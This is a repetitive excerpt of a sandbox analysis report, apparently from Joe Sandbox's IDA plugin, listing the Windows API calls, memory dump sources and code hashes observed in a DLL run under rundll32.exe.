                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value$Heap$AllocProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3559649508-0
                                                                                                                                                                                      • Opcode ID: 989d43833420a3ebe3e20cf2910c93b9ddfa3130c92b4a0bffaebffce5114eb0
                                                                                                                                                                                      • Instruction ID: 2789e1b6f6b0cb8852eda3a0e9bd514e6f2fa3dd5afe3516047c350c6e135b1a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 989d43833420a3ebe3e20cf2910c93b9ddfa3130c92b4a0bffaebffce5114eb0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 02118EF0604A26CBEB504BF5D854B563A9CAFD3244F098D24D906EF740DB75D84ACEB8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E9F358D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      • API String ID: 0-2837366778
                                                                                                                                                                                      • Opcode ID: 9e1f48e7d4c4ccf22c0f8f9b8bbbe6ea4e9bc763199a1c945c8889421534befe
                                                                                                                                                                                      • Instruction ID: 19deb51f2fdde3204254b1a079408ac96241eb302b23675fe95894fbbb53e6f1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e1f48e7d4c4ccf22c0f8f9b8bbbe6ea4e9bc763199a1c945c8889421534befe
                                                                                                                                                                                      • Instruction Fuzzy Hash: A8219F71604209EFDB00DFF6D84988A77ADEF813687014928F81997350DB38E8528FA2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,6E9F04E3,00000000,?,00000001,00000000,?,6E9F055A,00000001,FlsFree,6EA26184,FlsFree,00000000), ref: 6E9F04B2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                                                                      • Opcode ID: 00b027a101c6163f9a191628d729f3ac4e33b58fff992557347aa8226a89624d
                                                                                                                                                                                      • Instruction ID: ede82a63810032cfd94028958bcf157e5b3400b1c6fdbf509f074fc4d85b75c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 00b027a101c6163f9a191628d729f3ac4e33b58fff992557347aa8226a89624d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D11C172A55621EFDF528EA99840B4D33ACAF02770F254520ED15FB380F670ED028BD4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9B6B453B,00000000,?,00000000,6E9F9B33,000000FF,?,6E9F127D,?,?,6E9F1251,?), ref: 6E9F1322
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E9F1334
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,6E9F9B33,000000FF,?,6E9F127D,?,?,6E9F1251,?), ref: 6E9F1356
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                      • Opcode ID: 87507f647e4f75757d05af82b33c59e87c7f6e7d8424131cf5b9854ea2fd4d24
                                                                                                                                                                                      • Instruction ID: 832521a21cb1f3483bba80a94e7463bcf8f9857cfab4411e32900eb178574140
                                                                                                                                                                                      • Opcode Fuzzy Hash: 87507f647e4f75757d05af82b33c59e87c7f6e7d8424131cf5b9854ea2fd4d24
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8201A2B2904959EFDF018F90DC04FAEBBB8FF46711F044525E822A2780DBB49905CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32), ref: 6E9DC285
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6E9DC295
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: SetThreadDescription$kernel32
                                                                                                                                                                                      • API String ID: 1646373207-1950310818
                                                                                                                                                                                      • Opcode ID: d36d8dcef8aedaada3ce5e118300fe138664c48df6cc1a015d590023ec3820ec
                                                                                                                                                                                      • Instruction ID: 01de7d2bc949015b582889094ddc131455a38afbd605a673e6848eeafbaf9a5f
                                                                                                                                                                                      • Opcode Fuzzy Hash: d36d8dcef8aedaada3ce5e118300fe138664c48df6cc1a015d590023ec3820ec
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75B09BF05445015EDE505EF1695C65535187FD320130848906117E5101DED4C040E979
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll), ref: 6E9DC2C5
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6E9DC2D5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: NtWaitForKeyedEvent$ntdll
                                                                                                                                                                                      • API String ID: 1646373207-2815205136
                                                                                                                                                                                      • Opcode ID: 2567cf3143bbee6c6a267ab663b8f86852c9bfccd072a35d560b02b0679a2bbb
                                                                                                                                                                                      • Instruction ID: 36f7811989c865ab2471f0784080f69ce20273c68617227ec6e23b6c456a1752
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2567cf3143bbee6c6a267ab663b8f86852c9bfccd072a35d560b02b0679a2bbb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 97B092F0A08E016EAE906AF16AACA563A28BFA32013484460A117E9100EA64C0409DA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll), ref: 6E9DC2E5
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6E9DC2F5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: NtReleaseKeyedEvent$ntdll
                                                                                                                                                                                      • API String ID: 1646373207-31681898
                                                                                                                                                                                      • Opcode ID: 9d9fd1deb0bba7a67472b4c3fe000f9e208f0f9fc4f0b5d07f57bcadbc5cbfe9
                                                                                                                                                                                      • Instruction ID: 5fb1955b7fb730941ee7d99e30744c02f0b69b26dec777896de567a8f5b1031f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d9fd1deb0bba7a67472b4c3fe000f9e208f0f9fc4f0b5d07f57bcadbc5cbfe9
                                                                                                                                                                                      • Instruction Fuzzy Hash: DDB092F0A08D026EDE606AF26AACA563918BF932013084460A123F9200FA64C040AD29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32), ref: 6E9DC265
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6E9DC275
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32
                                                                                                                                                                                      • API String ID: 1646373207-392834919
                                                                                                                                                                                      • Opcode ID: 73f954d8b18c3c2ff75f2e97336ecf9c471554001dccd7c784e67cfa26634a0e
                                                                                                                                                                                      • Instruction ID: ab31b927c242950f452cb805cea270d97acd37c98d4aad44cd1972591c14a294
                                                                                                                                                                                      • Opcode Fuzzy Hash: 73f954d8b18c3c2ff75f2e97336ecf9c471554001dccd7c784e67cfa26634a0e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 07B092F06089016EEE606EF16AACA563919BFA320130848A0A213E9140EAA4C080AD29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll), ref: 6E9DC305
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6E9DC315
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: NtCreateKeyedEvent$ntdll
                                                                                                                                                                                      • API String ID: 1646373207-1373576770
                                                                                                                                                                                      • Opcode ID: 3b1d776f789b761b53127d30f3edc0fecbdf7fa9857315e3a7455323824ae399
                                                                                                                                                                                      • Instruction ID: a5ad60ef05523f8a682a35c1326ec2f7e87b24fa4a5e3d93457fae3468809b8b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b1d776f789b761b53127d30f3edc0fecbdf7fa9857315e3a7455323824ae399
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BB092F0A08D016F9E50AAF17AACA563918FF632823488460A423E9116EA64C0409D29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(9B6B453B,?,00000000,?), ref: 6E9F67AC
                                                                                                                                                                                        • Part of subcall function 6E9F4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E9F61E2,?,00000000,-00000008), ref: 6E9F411F
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E9F6A07
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E9F6A4F
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9F6AF2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                                                                      • Opcode ID: 9f516e9493479bb50b0352ea94f5514d04b3832686e0480147172125d8277487
                                                                                                                                                                                      • Instruction ID: 5506f209d62c9907507c78856d083e4f5775ccb0ebab0519856a80185eabab86
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f516e9493479bb50b0352ea94f5514d04b3832686e0480147172125d8277487
                                                                                                                                                                                      • Instruction Fuzzy Hash: 06D14AB5D14259EFCB01CFE8C8809EDBBB4EF49314F18852AE855AB242D730E942CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6E9E2601
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6E9E2653
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?), ref: 6E9E265D
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?), ref: 6E9E26C5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleErrorLastWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4006445483-0
                                                                                                                                                                                      • Opcode ID: 83fae12f1a04bc72684db611cb5e182b11498574392b1fb722dfff617e7f4fe1
                                                                                                                                                                                      • Instruction ID: 33b35dd145ee2cfd4fc660b3f586017aaf1a75bf032ef4e2b8d7a477d40f8016
                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fae12f1a04bc72684db611cb5e182b11498574392b1fb722dfff617e7f4fe1
                                                                                                                                                                                      • Instruction Fuzzy Hash: B361AB31A083178BE7068E99CC6076E77A6EFC5704F048939E69587B84FAB1D8018E92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                      • Opcode ID: bbc3aa02874f919a5562fc59bf0e93d19a0289ffcaaf288ffccd832525a6e6ad
                                                                                                                                                                                      • Instruction ID: 2af92cfe98e7f60a8e59c218fc012d072fd3007263852d4a65d99e9386d3f961
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbc3aa02874f919a5562fc59bf0e93d19a0289ffcaaf288ffccd832525a6e6ad
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51A2726056069FDB168F91E450BBE73A8FF65318F30492EDA1557A90EB31E841CF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9F4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E9F61E2,?,00000000,-00000008), ref: 6E9F411F
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9F2DEB
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 6E9F2DF2
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 6E9F2E2C
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 6E9F2E33
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1913693674-0
                                                                                                                                                                                      • Opcode ID: 93c15d6b6b0cf42dc3d6a26a55b7f32a4fe8baa83435e9fdc21af0d11b62ef36
                                                                                                                                                                                      • Instruction ID: aa4aca6d9a605c3eaa63a07a1eba400dcdb232c6f9d12dd8650245b809a5dda7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93c15d6b6b0cf42dc3d6a26a55b7f32a4fe8baa83435e9fdc21af0d11b62ef36
                                                                                                                                                                                      • Instruction Fuzzy Hash: F321C271604345EFDB50DFF6C890A9BB7BDEF813687208929E82897210D731EC428F91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000), ref: 6E9F7EBD
                                                                                                                                                                                      • GetLastError.KERNEL32(?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000,?,?,?,6E9F70CD,?), ref: 6E9F7EC9
                                                                                                                                                                                        • Part of subcall function 6E9F7E8F: CloseHandle.KERNEL32(FFFFFFFE,6E9F7ED9,?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000,?,?), ref: 6E9F7E9F
                                                                                                                                                                                      • ___initconout.LIBCMT ref: 6E9F7ED9
                                                                                                                                                                                        • Part of subcall function 6E9F7E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E9F7E80,6E9F7844,?,?,6E9F6B46,?,?,00000000,?), ref: 6E9F7E64
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000,?), ref: 6E9F7EEE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                      • Opcode ID: dd9c94531d17c9aabc47d9c95ac52843ef7706f751a987b606ea415c5adf91ea
                                                                                                                                                                                      • Instruction ID: b0aea88c5000f548169e967b427263a421fe024fe0e2e7f9f0500202d91901e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd9c94531d17c9aabc47d9c95ac52843ef7706f751a987b606ea415c5adf91ea
                                                                                                                                                                                      • Instruction Fuzzy Hash: A1F0F836024618FBCF121ED1AC04EDA3F2AFF4A3A4B098411FA19A9560C732CC619B90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E9EFAC5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EncodePointer
